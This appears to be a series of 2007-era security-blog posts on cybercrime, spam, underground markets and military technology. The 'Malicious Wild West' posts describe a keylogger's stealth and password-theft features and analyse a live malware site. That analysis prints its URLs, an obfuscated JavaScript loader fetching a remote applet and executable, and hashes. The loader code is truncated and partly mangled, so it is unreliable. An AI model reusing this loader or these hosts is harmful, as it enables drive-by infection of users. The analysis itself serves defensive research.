Jihadists Using Kaspersky Anti Virus

I wonder what are the low lifes actually protecting themselves from? Malware attacks in principle, or preparing to prevent a malware infection courtesy of an unamed law enforcement agency given their interest in coding malware :

"German police officials have expressed interest in developing software tools to help them surveil computer users who may be involved in crime. The tools might include types of software similar to those used in online fraud and theft schemes, such as programs that record keystrokes, logins and passwords. Security companies, however, are asserting that they wouldn't make exceptions to their software to accommodate, for example, Trojan horse programs planted by law enforcement on users' computers."

This is a very contradictive development that deserves to be much more actively debated around the industry than it is for the time being. Law enforcement agensies and intelligence agencies have always been interested in zero day vulnerabilities and firmware infections, thus gaining a competitive advantage in the silent war. Among the most famous speculations of an intelligence agency using malicious code for offensive purposes is the infamous CIA infection/logicbomb of Russian gas pipeline :

"While there were no physical casualties from the pipeline explosion, there was significant damage to the Soviet economy. Its ultimate bankruptcy, not a bloody battle or nuclear exchange, is what brought the Cold War to an end. In time the Soviets came to understand that they had been stealing bogus technology, but now what were they to do? By implication, every cell of the Soviet leviathan might be infected. They had no way of knowing which equipment was sound, which was bogus. All was suspect, which was the intended endgame for the operation. The faulty software was slipped to the Russians after an agent recruited by the French and dubbed "Farewell" provided a shopping list of Soviet priorities, which focused on stealing Western technology."

Excluding the spy thriller motives, nothing's impossible the impossible just takes a little while, and the same goes for SCADA devices vulnerabilities and on purposely shipping buggy software. Anti virus vendors will get even more pressure trying to protect their customers from not only the malware released by malware authors, but also from the one courtesy of law enforcement agencies. Cyber warfare is here to stay, no doubt about it, but using malware to monitor suspects will perhaps prompt them to keep an eye on the last time their AV software got updated, and still keep pushing the update button in between. Continue reading →

ASCII Art Spam

A spammer's biggest trade off - making it through anti-spam filters doesn't mean the email receipt will even get the slightest chance of understanding what he's about to get scammed with.

"We have seen SPAM using ASCII ART in order to avoid being detected by antispam filters. Most of the times, they try to show different words (Viagra, etc.) using this technique, but this is the first time I have seen them showing a picture. It is not a very high quality one, but I’ve tried it with some different antispam filters and they have been fooled."

Here's an old school ASCII generator you can play around with, and a related image from a previous post on overperforming spammers. Continue reading →

The Underground Economy's Supply of Goods

Symantec (SYMC) just released their latest Internet Security Threat Report, a 104 pages of rich on graphs observations, according to the data streaming from their sensor network :

"Volume XI includes a new category: “Underground Economy Servers”. These are used by criminals and criminal organizations to sell stolen information, including government-issued identity numbers, credit cards, bank cards and personal identification numbers (PINs), user accounts, and email address lists. To reduce facilitating identity theft, organizations should take steps to protect data stored on or transmitted over their computers. It is critical to develop and implement encryption to ensure that any sensitive data is protected from unauthorized access."

In between their coverage on various segments such as vulnerabilities, phishing, spam, and yes malware despite that I'm having my doubts on SMTP as the major propagation vector on a worldwide scale, I came across to a nice figure summarizing their encouterings while browsing around various forums and web sites.

The question is - why are these underground goods cheaper than a Kids' menu at McDonalds as I've once pointed out at O'Reilly's Radar post on spamonomics? Because in 2007 we can easily speak of "malicious economies of scale" thus, profit margin gains despite the ongoing zero day vulnerabilities cash bubble at certain forums, doesn't seem to be that very important. So can we therefore conclude that greed isn't the ultimate driving force, but trying to get rid of the stolen information in the fastest way possible in between taking into consideration its dissapearing exclusiveness with each and every minute? The principle goes that a dollar earned today is worth more than a dollar earned tomorrow, but how come? Simple, by tomorrow the exclusiveness of your goods might by just gone, because the affected parties detected the leaks and took actions to prevent the damage.

Issues to keep in mind regarding the graph:
- Harvested spam databases have been circulating around for years and so turned into a commodity, for instance, I often come across geographically segmented databases or per email provider segmented ones, not for sale, but for free. So how come the "good" is offered for free? It's obviously fine for the "good" to be offered for free when there's a charge for service, the service of verifying the validity of the emails, the service of encoding the message in a way to bypass anti spam filters, and the service of actually sending the messages

- Where's the deal of a malicious party when selling an online banking account with a $9,900 balance for just $300? For me, it's a simple process of risk-forwarding to a party that is actually capable of getting hold of the cash

- Yahoo and Hotmail email cookies per piece? Next it will be an infected party's clickstream for sale, and you'll have the malicious parties competing with major ISPs who are obviously selling yours for the time being.

- Compromised computers per piece? Not exactly. Entire botnets or the utilization of the possible services offered on demand for a price that's slightly a bit higher than the one pointed out here.

Psychological imagation is just as important as playing a devil's advocate to come up with scenario building tactics in order to protect your customers and yourself from tomorrow's threats.

Related images:
- surveying potential buyers of zero day vulnerabilities in order to apply marginal thinking in their proposition
- advertisement for selling zero day vulnerabilities
- listing of available exploits
- zero day vulnerabilities shop, I'm certain it's a PHP module that's currently hosted somewhere else
- the WebAttacker toolkit
- The RootLauncher
- The Nuclear Grabber and geolocated infections-- site dissapeared already
Continue reading →

Subconscious Search Monopoly Sentiments

And hey, that's from someone attending the Microsoft MVP for N-th time :

"I was invited to attend the Microsoft MVP Summit last week. If you want to know what the Summit is about or what a MS MVP is, Google is your friend."

Microsoft's MVP is a great corporate citizenship tool, whereas empowering and crediting the individual on a wide scale compared to internal reputation benchmarking is an indirect use of the "act as an owner" management tactic -- implement it. Supporting existing standarts -- look up interoperability -- benefits us all, reinventing the wheel without an unique vision besides ever increasing (projected) profit margins, wouldn't even benefit the company in the long term.

If you truly want to disrupt, disrupt by first (legally) taking the advantage of using someone else's already developed foundations to do so, the rest is attitude and hard to immitate competitive advantages. Good brainstorming questions in Anil's post whatsoever. Continue reading →

Spam Comments Attack on TechCrunch Continuing

In a previous post I commented on O'Reilly.com's war on spam according to their statistics, and thought you might find the most recent TechCrunch blog spam stats they've recently provided, informative as well :

"On January 4 we reported that the Akismet filter had stopped a million spam comments from reaching TechCrunch. At that point we’d been using it for about nine months. The number of blocked spam comments is now two million, just ten weeks later. That works out to about 15,000 spam comments hitting TechCrunch every day. If we did not have Akismet, we couldn’t allow anonymous commenting here on TechCrunch. We used to go through all spam comments to pick out the occasional false positive and accept it. Now, there are just too many to go through. All comments marked by Akismet as spam get deleted almost immediately."

I turned blog comments off quite a while ago and to be honest, the best comments, recommendations and tips, as well as people I've met through this blog, I received over email and backlinks. Keep 'em coming! Moreover, it's not just the inability of service providers to keep up with the aggresive generation of splogs, but malicious parties are already exploiting some of the fancy features that make blogs so flexible when it comes to personalization and social networking. Next time Fortinet will come up with another advisory, this time discussing MySpace so consider it as a cyclical shift from one provider to another depending on the current defenses in place -- blackhat SEO. Continue reading →

Personal Data Security Breaches Spreadsheet

Some stats try to emphasize on the number of people affected while forgetting the key points I outlined in a previous post related to why we cannot measure the real cost of cybercrime, and yes, duplicates among the affected people in any of the statistics available. The number of people affected will continue to rise, but that's not important, what's important is to identify the weakest link in this process, and for the time being, you're a "data hostage" in order to enjoy your modern lifestyle -- ever asked yourself what's gonna happen with your digital data after you're gone?

Spreadsheet nerds, here's something worth taking the time to around with, most importantly this huge dataset debunks the common myth of hackers taking the credit for the majority of personal data security breaches, whereas as you can see in the figures, on the majority of occasions -- and it's an ongoing trend -- companies themselves should get into the spotlight :

"On average, in 2005 personal records were compromised at a rate of 5.2 million a month. On average, in 2005 personal records were compromised at a rate of 5.8 million a month. Assuming a similar rate of growth, by November or December this year we we should cross the 2.0 billion mark. This is a conservative estimate because many of the news stories we archived were conservative on their own estimates of how many records were lost in particular incidents, and because a small number of incidents are reported without details of how many personal records were compromised.

View figures and tables of this paper as a *.pdf. View pre-publication draft of paper as a *.pdf. View dataset of incidents as a *.xls. View University of Washington Press office news release on this research."

Graphic presenting the risk of identity theft in the U.S only, based on the severity of data breaches, courtesy of the Danny Dougherty.

Continue reading →

Complexity and Threats Mind Mapping

The folks at Security-Database.com -- who by the way expressed their excitement over my blog -- just released an outstanding mind mapping graph on the most common firefox security extensions used for various purposes starting from information gathering, and going up to data tampering :

"FireCAT is based upon a paper we wrote some weeks before (Turning firefox to an ethical hacking platform) and downloaded more than 25 000 times. We also thank all folks that encouraged us and sent their suggestions and ideas to make this project a reality. This initial release is presented as a mindmap and we are open to all your suggestions to make it a really good framework for all the community of security auditors and ethical hackers. We will make a special page for this framework soon to let you monitor this activity."

Great idea, reminds of Ollie Whitehouse's excellent mind mapping of mobile device threats. The semantics of security when applied in a visualized manner have the potential to limit the "yet another malware variant in the wild" type of news articles, or hopefully help the mainstream media break out of the "echo chamber" and re-publishing myopia, thus covering the basics.

Anyway, which is the most useful tool you'll ever encounter? It's called experience. Which is the most important threat to keep an eye on? It's your inability of not knowing what's going on at a particular moment, lack of situational awareness. Continue reading →

Threats of Using Outsourced Software - Part Two

Continuing the coverage on the U.S government's overall paranoia of using outsourced software on DoD computers, even hardware -- firmware infections are still in a spy's arsenal only -- in a recent move by the Defense CIO office a tiger team has been officially assigned to audit the software and look for potential backdoors :

"The Pentagon is fielding a task force charged with testing software developed overseas, according to a Defense Department official. The “tiger team,” organized within the Defense CIO’s office, is ready to move to the implementation stage, said Kristen Baldwin, deputy director for software engineering and systems assurance in the Office of the Undersecretary of Defense for Acquisition, Technology, and Logistics. Baldwin spoke yesterday at the DHS-DOD Software Assurance Forum in Fairfax, Va. “Tiger team” is a software-industry term for a group that conducts penetration testing to assess software security. “Success means they understand where their focus needs to be and how to prioritize their efforts,” Baldwin said. “They understand the supply-chain impact on systems engineering, and are ready to move forward in an effort to mitigate assurance risk.”"

There's another perspective you should keep in mind. Looking for backdoors is shortsighted, as the software may come vulnerabilities-ready, so prioritizing whether it's vulnerabilities or actualy backdoors to look for will prove tricky. The use of automated source code auditing may prove valuable as well, but taking into consideration the big picture, if you were to track the vulnerabilities that could act as backdoors in U.S coded software -- taking Windows for instance -- compared to that of foreign software, you'll end up with rather predictable results.

The bottom line, does shipping an insecure software has to do with source code vulnerabilities, or should the threat be perceived in relation to backdoor-shipped software? The true ghost in the shell however remain the yet undiscovered vulnerabilities in the software acting as vectors for installing backdoors, not the softwared itself shipped backdoor-ready. Meanwhile, are stories like these a violation of OPSEC by themselves? I think they are. Continue reading →

Timeline of Iran's Nuclear Program

Iran's a rising star these days. It's not just that the country recently launched it's first missile into space despite efforts of the international community to ban its nuclear program, got caught into obtaining sensitive military technology, is currently helping the enemies(Hezbollah) of its enemies(the U.S) but also, have Russia enriching their uranium in between legally supplying them with technology and upgrade parts the U.S put an embargo on -- business as usual. Here's a very in-depth and informative timeline of Iran's entire nuclear program saga :

"The Bush Administration has almost certainly not approved the timing of military operations against Iran, and consequently any projection of the probable timing of such operations is neccessarily speculative. The election of Mahmoud Ahmadi-Nejad as Iran's new president would appear to preclude a negotiated resolution of Iran's nuclear program. The success of strikes against Iran's WMD facilities requires both tactical and strategic surprise, so there will not be the sort of public rhetorical buildup in the weeks preceeding hostilities, of the sort that preceeded the invasion of Iraq. To the contrary, the Bush Administration will do everything within its power to deceive Iran's leaders into believing that military action is not imminent."

Here's another timeline, this time of U.S-Iran contracts from 1979 until today. Continue reading →

Google Maps and Privacy

I thought I've seen the best close-ups from Google Maps in the top 10 naked people on Google Earth, but this screenshot is spooky as the guy is even looking straight into the sky which makes it even more interesting catch. It proves ones thing, Google are capable of providing high-res satellite imagery, which they aren't on a mass scale for the time being. Shall we speculate on the possible reasons why is this guy looking above, remotely controlled aerial surveillance device, but what's the relation with Google Maps whatsoever? More at Google Blogoscoped, as well as in previous posts related to the topic. Continue reading →

Touching the Future of Productivity

Visualization in military brienfings and intelligence gathering has been a daily lifestyle of analysts for years, but combining visualization and touchscreens makes it the perfect combination to boost productivity. We're very near to entering the stage where VR will not only save lifes in a war zone, but also allow a skilled and hard to replace warrior to operate a device while enjoying his Coke back home. Great demonstration. Via Defensetech.

Go through related posts on visualization and its future impact on information security and intelligence as well. Continue reading →

Ballistic Missile Defense Engagement Points

Outstanding animation covering pretty much all of the current engagement points in case a missile is fired from anywhere across the world, total syncronization between air, land and naval force, and I must say the background music is excellent too.



In a previous post, Who Needs Nuclear Weapons Anymore? I provided my reflection on the overal shift of threats nowadays compared to the ones back in the Cold War days you may informative, as well as an essay I wrote back in 1998. Cryptome's Eyeballing of Missile Defense is also worth going through. Continue reading →

Vladuz's Ebay CAPTCHA Populator

Nice slideshow courtesy of eWeek providing various screenshots related to Vladuz's impersonation attacks on Ebay :

"And whether or not Vladuz is responsible for writing a tool to automatically skim eBay customers accounts and thus cause sharp spikes in bogus listings being taken down and relisted multiple times a day, he or she has the mythic reputation at this point to be credited as the cause."

Compared to diversifying its targets, permanently sticking to Ebay as the main target is already prompting the Web icon to put more efforts into tracking him down. Last year for instance, automated bots exploited Ebay's CAPTCHA and started self-recommending each other, but with Vladuz's Ebay CAPTCHA Populator, improving the quality of Ebay's authentication process should get a higher priority than tracking him down as another such tool will follow from someone else out there. Continue reading →

Photoshoping Your Reality

It's not just a stereotyped beauty model, advanced image editing tools and techniques can make you believe in, but they can also influence your understand of reality too as you can see in Wired's famous altered photos collection :

"A picture is worth a thousand words, and Photoshop and similar tools have made it easier than ever to make those words fib. But while computers enable easier and better photo manipulation, it is hardly a new phenomenon. Here is a sampling of some of the more famous altered photographs from the last century."

Here's a free service letting you fake photos. Here's another one as well as a variant of mine in relation to a previous post. Continue reading →

Shots from the Malicious Wild West - Sample Three

Keyloggers on demand, the so called zero day keyloggers ones created especially to be used in targeted attacks are something rather common these days. Among the many popular ones that remained in service and has been updated for over an year is The Rat! Keylogger. Here are some prices in virtual WMZ money concerning all of its versions :

The Rat! 7.0XP - 29 WMZ
The Rat! 6.0XP/6.1 - 22 WMZ
The Rat! 5.8XP - 15 WMZ
The Rat! 5.5XP - 13 WMZ
The Rat! 5.0XP - 9 WMZ
The Rat! 4.0XP - 8 WMZ
The Rat! 3.xx - 7 WMZ
The Rat! 2.xx - 6 WMZ

An automated translation of its features :

For the installation to the machines with the operating systems Windows xp, Windows 2000 and on their basis. Finale - apotheosis! Let us recall again, for which we love our rodent:
- the size of file- result is record small - 13 312 bytes in the nezapakovannom form (with the packing with use FSG, 6 793 bytes!).
- not it detektitsya as virus by antiviryami.
- it follows the buffer of exchange.
- the system of invisibility and circuit of fayervola.
- the fixation of pressure you klavish' in the password windows and the console.
- the sending of lairs on e-mail, with the support to autentifikatsii RFC - 2554.
- the encoding of dump.
- tuning the time of activation and time of stoppage
- removal in the time indicated without it is trace and reloading.

Digital fingerprints will follow as soon as I finish bruteforcing the password protected archives. Continue reading →

Shots from the Malicious Wild West - Sample Two

Packers are logically capable of rebooting the lifecycle of a binary and making it truly unrecognizable. The Pohernah Crypter is among the many recently released packers you might be interested in taking a peek at. By the time a packer's pattern becomes recognizable, a new one is introduced, and in special cases there are even packers taking advantage of flaws in an AV software itself.

Compared to the common wisdom of malware authors being self-efficient and coming up with packers by themselves, we've already seen cases where investments in purchasing commercial anti-debugging software is considered. You may find these test results of various anti virus software against packed malware informative, which as a matter of fact truly back up my experience with the winning engines and their performance in respect to packed malware.

File size: 6901 bytes
MD5: 6ce1283af00f650e125321c80bf42097
SHA1: 08ac9a9e2181d8a94e6d96311c21c8db1766e2f1 Continue reading →

Shots from the Malicious Wild West - Sample One

Come to daddy. At _http://www.ms-counter.com we have an URL spreading malware through redirectors and the natural javascript obfuscation :

Input URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Effective URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Responding IP: 81.95.148.10
Name Lookup Time: 0.300643
Total Retrieval Time: 0.887313
Download Speed: 9878

Then we get the following :




var keyStr = "ABCDEFGHIJKLMNO"+"PQRSTUVWXYZabcdefghijk"+"lmnopqrstuvwx"
+"yz0123456789+/="; function decode64(input) { var output = ""; var chr2, chr3,
chr1; var enc4, enc2, enc1, enc3; var i = 0; input = input.replace(/[^A-Za-z0-9\
+\/\=]/g, ""); do { enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.index
Of(input.charAt(i++)); enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr.
indexOf(input.charAt(i++)); chr1 = (enc1 <<>> 4); chr2 = ((enc2 & 15)
<<>> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.from
CharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); }
if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while
(i < input.length); return output; } document.write(decode64("IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5q
YXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD
0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291b
nRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcml
wdCBsYW5ndWFnZT0nam ETC. ETC. ETC.

Deobfuscating the javascript we get to see where the binary is :

Input URL: _http://ms-counter.com/mscounter/load.php
Effective URL: _http://ms-counter.com/mscounter/load.php
Responding IP: 81.95.148.10
Name Lookup Time: 0.211247
Total Retrieval Time: 1.065943
Download Speed: 12898

Server Response :
HTTP/1.1 200 OK
Date: Sat, 10 Mar 2007 00:49:27 GMT
Server: Apache
X-Powered-By: PHP/4.4.4
Content-Disposition: attachment; filename="codecs.exe"
Connection: close
Transfer-Encoding: chunked
Content-Type: application/exe

File info :
File size: 13749 bytes
MD5: f0778c52e26afde81dffcd5c67f1c275
SHA1: d61c6c17b78db28788f9a89c12b182a2b1744484

Running it over VT we get the following results you can see in the screenshot. It's obvious major AV software doesn't detect this one, but what you should keep in mind is the currently flawed signatures based malware detection approach. That's of course given someone's considering updating their AV software. In another analysis I'll come with another binary that all major AV vendors detect, but the second tier ones doesn't. Host based IPS based protection and behaviour blocking, and the actual prevention of loading the script is the way to avoid the exploitation of the flaws in signatures based scanning protection. Continue reading →

Envy These Women Please

Differentiating from the usual Most Powerful Women list, Forbes did a little niching to come up with a slideshow of women billionaires they envy most :

"Imagine for a moment what it would be like to be a billionaire. No more picking up after the kids, doing dishes, worrying about how much a dress costs or pinching pennies to save for an amazing vacation. For the women on Forbes' new list of the world's billionaires, that dream is a reality. But it's not just their 10-figure fortunes that make us envious. Some of these women are famous; some wield enormous power; some have fascinating careers. Some have all three."

Is it just me, or inherited wealth is boring right from the very beginning? The emergence of the spoon people, or so they say -- "Spoon feeding in the long run teaches us nothing but the shape of the spoon" Edward Morgan Forster. A week ago I participated in a discussion about power, most importantly one trying to define power and we ended up with several states of power - positional power, the C-level executives, expertise power, or the revenge of the underestimated walking case studies, and networking power. It's all a cyclical process like pretty much anything in life. Continue reading →

U.K's Latest Military Satellite System

The U.K military is about to upgrade their Skynet 4 satellite system to Skynet 5 :

"Four steerable antennas give it the ability to focus bandwidth on to particular locations where it is most needed - where British forces are engaged in operations. Its technologies have also been designed to resist any interference - attempts to disable or take control of the spacecraft - and any efforts to eavesdrop on sensitive communications. An advanced receive antenna allows the spacecraft to selectively listen to signals and filter out attempts to "jam" it."

Among the many features the new system introduces, two are worth mentioning - it's targeted bandwidth capability where it's needed and the sort of DENY:ALL upgraded receive antenna to avoid jamming. Now pray China won't take it down, or let the debris (conveniently) take care of the rest -- so vulnerable it makes you want to establish a space warfare code of conduct. Continue reading →

Armed Land Robots

After seeking to dominate the air, it's time defense contractors turn back to innovating on the ground, especially when we speak of armed and remotely controlled robots. Crucial for both, reconnaissance and guerilla warfare situations, movement flexibity as well as payload capacity is what adds more value to these robots. An Israeli based defense contractor Elbit Systems recently introduced The Viper :

"The Viper, which is about a foot long and weigh approximately five pounds, is powered by a special electrical engine and operated by remote control or according to a program implanted in its 'brain' in advance. It is capable of climbing stairs, getting past obstacles and at the same time checks what is going on around it by means of a system of sensors. Equipped with a special nine-millimeter caliber Uzi machine gun, on which a laser pointer has been installed. The Viper is carried to the battlefield by a soldier on his back in a special carrier. When it is necessary to infiltrate a building safely where, for example, armed terrorists are hiding, the soldier lowers it to the ground, turns it on and from that moment controls it from a distance."

I'm very interested in the possibility for a 360 degree view, it's noise generation level, the variety of terrains its supports, and most importantly - would it put itself back on its "feet" if it inevitably turns upside down. See, you wouldn't want your pricey attack toy acting like a cheap remotely controlled car toy, would you? Engadget has a photo of Viper.

Here's a recommended article on the history of armed aerial UAVs, as well as a recent story on beam energy weapons, the vomit beam in this case. Continue reading →